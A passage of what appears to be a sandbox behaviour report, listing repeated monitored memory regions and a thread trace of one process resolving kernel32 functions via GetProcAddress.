0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3447 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3448 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3449 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3450 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3451 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3452 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3453 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3454 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3455 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3456 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3457 start_va = 0x4890000 end_va = 0x4890fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004890000" filename = "" Region: id = 3458 start_va = 0x49a0000 end_va = 0x49a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049a0000" filename = "" Region: id = 4739 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4740 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4741 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4742 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4743 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4744 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4745 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4746 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4747 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4748 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4749 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4750 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4751 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4752 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4753 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4754 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4755 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4756 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4757 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4758 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4759 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4760 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4761 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4762 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4763 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4764 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4765 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4766 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4767 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4768 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4769 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4770 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4771 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4907 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4908 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4909 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4910 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4911 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4912 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4913 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4914 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4915 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4916 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4917 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4918 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4919 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4920 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4921 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4922 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4923 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4924 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4925 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4926 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4927 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4928 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4929 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4930 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4931 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4932 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4933 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4934 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4935 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4936 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4937 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4939 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4940 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4941 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4942 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4943 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4944 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4945 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4946 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4947 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4948 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4949 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4950 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4951 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4952 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4953 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4954 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4955 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4956 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4957 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4958 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4959 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4960 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4961 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4979 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4980 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4981 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4982 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4983 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4984 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4985 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4986 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4987 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4988 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4989 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4990 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4991 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4992 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4993 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4994 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4995 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4996 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4997 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4998 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4999 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 5000 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 5001 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 5002 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 5003 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 5004 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 5005 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 5006 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 5010 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 5011 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 5012 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 5013 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 5014 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 5015 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 5016 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 5017 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 5018 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 5019 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 5020 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 5021 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 5022 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 5023 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 5024 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 5025 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 5026 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 5027 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 5028 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 5029 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 5030 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 5031 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 5032 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 5033 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 5034 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 5035 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 5036 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Thread: id = 61 os_tid = 0xfbc [0290.213] GetProcAddress (hModule=0x74c90000, lpProcName="LoadResource") returned 0x74ca76f0 [0290.213] GetProcAddress (hModule=0x74c90000, lpProcName="LockResource") returned 0x74ca7890 [0290.213] GetProcAddress (hModule=0x74c90000, lpProcName="SizeofResource") returned 0x74ca8f80 [0290.214] GetProcAddress (hModule=0x74c90000, lpProcName="FindResourceW") returned 0x74cb2a40 [0290.214] GetProcAddress (hModule=0x74c90000, lpProcName="lstrcmpiA") returned 0x74ca7830 [0290.214] GetProcAddress (hModule=0x74c90000, lpProcName="MultiByteToWideChar") returned 0x74ca2ad0 [0290.214] GetProcAddress (hModule=0x74c90000, lpProcName="WideCharToMultiByte") returned 0x74ca3880 [0290.214] GetProcAddress (hModule=0x74c90000, lpProcName="IsDBCSLeadByte") returned 0x74cac990 [0290.214] GetProcAddress (hModule=0x74c90000, lpProcName="GetWindowsDirectoryW") returned 0x74cb5120 [0290.214] GetProcAddress (hModule=0x74c90000, lpProcName="HeapCreate") returned 0x74caa100 [0290.214] GetProcAddress (hModule=0x74c90000, lpProcName="HeapSetInformation") returned 0x74caa8e0 [0290.214] GetProcAddress (hModule=0x74c90000, lpProcName="InitOnceExecuteOnce") returned 0x75b7c2d0 [0290.214] GetProcAddress (hModule=0x74c90000, lpProcName="InitializeCriticalSection") returned 0x777ba200 [0290.214] GetProcAddress (hModule=0x74c90000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x74cb6730 [0290.214] GetProcAddress (hModule=0x74c90000, lpProcName="InitializeSListHead") returned 0x777c5f60 [0290.215] GetProcAddress (hModule=0x74c90000, lpProcName="IsDebuggerPresent") returned 0x74cab0b0 [0290.215] GetProcAddress (hModule=0x74c90000, lpProcName="IsProcessorFeaturePresent") returned 0x74ca9bf0 [0290.215] GetProcAddress (hModule=0x74c90000, lpProcName="IsValidCodePage") returned 0x74caa790 [0290.215] GetProcAddress (hModule=0x74c90000, lpProcName="IsValidLocale") returned 0x74caab40 [0290.215] GetProcAddress (hModule=0x74c90000, lpProcName="IsWow64Process") returned 0x74ca9f10 [0290.215] GetProcAddress (hModule=0x74c90000, lpProcName="K32GetPerformanceInfo") returned 0x74cd16e0 [0290.215] GetProcAddress (hModule=0x74c90000, lpProcName="K32GetProcessMemoryInfo") returned 0x74cd1740 [0290.215] GetProcAddress (hModule=0x74c90000, lpProcName="K32QueryWorkingSetEx") returned 0x74cd17c0 [0290.215] GetProcAddress (hModule=0x74c90000, lpProcName="LCMapStringW") returned 0x74ca9f30 [0290.215] GetProcAddress (hModule=0x74c90000, lpProcName="LoadLibraryExA") returned 0x74caa270 [0290.215] GetProcAddress (hModule=0x74c90000, lpProcName="LoadLibraryExW") returned 0x74ca7930 [0290.215] GetProcAddress (hModule=0x74c90000, lpProcName="LoadLibraryW") returned 0x74caa840 [0290.216] GetProcAddress (hModule=0x74c90000, lpProcName="LocalFree") returned 0x74ca79a0 [0290.216] GetProcAddress (hModule=0x74c90000, lpProcName="LockFileEx") returned 0x74cb6b90 [0290.216] GetProcAddress (hModule=0x74c90000, lpProcName="MapViewOfFile") returned 0x74ca8d60 [0290.216] GetProcAddress (hModule=0x74c90000, lpProcName="MoveFileW") returned 0x74cab1d0 [0290.216] GetProcAddress (hModule=0x74c90000, lpProcName="OpenProcess") returned 0x74ca8bf0 [0290.216] GetProcAddress (hModule=0x74c90000, lpProcName="OutputDebugStringA") returned 0x74cafde0 [0290.216] GetProcAddress (hModule=0x74c90000, lpProcName="OutputDebugStringW") returned 0x74cd19a0 [0290.216] GetProcAddress (hModule=0x74c90000, lpProcName="PeekNamedPipe") returned 0x74cd19b0 [0290.216] GetProcAddress (hModule=0x74c90000, lpProcName="PostQueuedCompletionStatus") returned 0x74caa880 [0290.216] GetProcAddress (hModule=0x74c90000, lpProcName="ProcessIdToSessionId") returned 0x74ca8fa0 [0290.216] GetProcAddress (hModule=0x74c90000, lpProcName="QueryDosDeviceW") returned 0x74cb6ba0 [0290.216] GetProcAddress (hModule=0x74c90000, lpProcName="QueryPerformanceCounter") returned 0x74ca38a0 [0290.216] GetProcAddress (hModule=0x74c90000, lpProcName="QueryPerformanceFrequency") returned 0x74ca8cc0 [0290.217] GetProcAddress (hModule=0x74c90000, lpProcName="QueryThreadCycleTime") returned 0x74caf2e0 [0290.217] GetProcAddress (hModule=0x74c90000, lpProcName="ReadConsoleW") returned 0x74cb6fe0 [0290.217] GetProcAddress (hModule=0x74c90000, lpProcName="ReadFile") returned 0x74cb6bb0 [0290.217] GetProcAddress (hModule=0x74c90000, lpProcName="ReadProcessMemory") returned 0x74cd1c80 [0290.217] GetProcAddress (hModule=0x74c90000, lpProcName="RegisterWaitForSingleObject") returned 0x74ca9f70 [0290.217] GetProcAddress (hModule=0x74c90000, lpProcName="ReleaseSRWLockExclusive") returned 0x777ad080 [0290.217] GetProcAddress (hModule=0x74c90000, lpProcName="ReleaseSemaphore") returned 0x74cb67b0 [0290.217] GetProcAddress (hModule=0x74c90000, lpProcName="RemoveDirectoryW") returned 0x74cb6bf0 [0290.217] GetProcAddress (hModule=0x74c90000, lpProcName="ReplaceFileW") returned 0x74cb4f60 [0290.217] GetProcAddress (hModule=0x74c90000, lpProcName="ResetEvent") returned 0x74cb67c0 [0290.217] GetProcAddress (hModule=0x74c90000, lpProcName="ResumeThread") returned 0x74caa800 [0290.217] GetProcAddress (hModule=0x74c90000, lpProcName="RtlCaptureContext") returned 0x74cb6290 [0290.218] GetProcAddress (hModule=0x74c90000, lpProcName="RtlCaptureStackBackTrace") returned 0x74cacc80 [0290.218] GetProcAddress (hModule=0x74c90000, lpProcName="RtlUnwind") returned 0x74ca8c10 [0290.218] GetProcAddress (hModule=0x74c90000, lpProcName="SearchPathW") returned 0x74cae790 [0290.218] GetProcAddress (hModule=0x74c90000, lpProcName="SetConsoleCtrlHandler") returned 0x74cb6ff0 [0290.218] GetProcAddress (hModule=0x74c90000, lpProcName="SetCurrentDirectoryW") returned 0x74cafb20 [0290.218] GetProcAddress (hModule=0x74c90000, lpProcName="SetEndOfFile") returned 0x74cb6c00 [0290.218] GetProcAddress (hModule=0x74c90000, lpProcName="SetEnvironmentVariableW") returned 0x74cae9e0 [0290.218] GetProcAddress (hModule=0x74c90000, lpProcName="SetFileAttributesW") returned 0x74cb6c20 [0290.218] GetProcAddress (hModule=0x74c90000, lpProcName="SetFilePointerEx") returned 0x74cb6c50 [0290.218] GetProcAddress (hModule=0x74c90000, lpProcName="SetHandleInformation") returned 0x74cb6660 [0290.219] GetProcAddress (hModule=0x74c90000, lpProcName="SetInformationJobObject") returned 0x74cdbd30 [0290.219] GetProcAddress (hModule=0x74c90000, lpProcName="SetNamedPipeHandleState") returned 0x74cd2390 [0290.219] GetProcAddress (hModule=0x74c90000, lpProcName="SetProcessShutdownParameters") returned 0x74cafd70 [0290.219] GetProcAddress (hModule=0x74c90000, lpProcName="SetStdHandle") returned 0x74cd2430 [0290.219] GetProcAddress (hModule=0x74c90000, lpProcName="SetThreadPriority") returned 0x74ca9990 [0290.219] GetProcAddress (hModule=0x74c90000, lpProcName="SetUnhandledExceptionFilter") returned 0x74caa940 [0290.219] GetProcAddress (hModule=0x74c90000, lpProcName="SignalObjectAndWait") returned 0x74cd25e0 [0290.219] GetProcAddress (hModule=0x74c90000, lpProcName="SleepConditionVariableSRW") returned 0x75bf7fb0 [0290.219] GetProcAddress (hModule=0x74c90000, lpProcName="SleepEx") returned 0x74cb67f0 [0290.219] GetProcAddress (hModule=0x74c90000, lpProcName="GetModuleHandleA") returned 0x74ca99f0 [0290.220] GetProcAddress (hModule=0x74c90000, 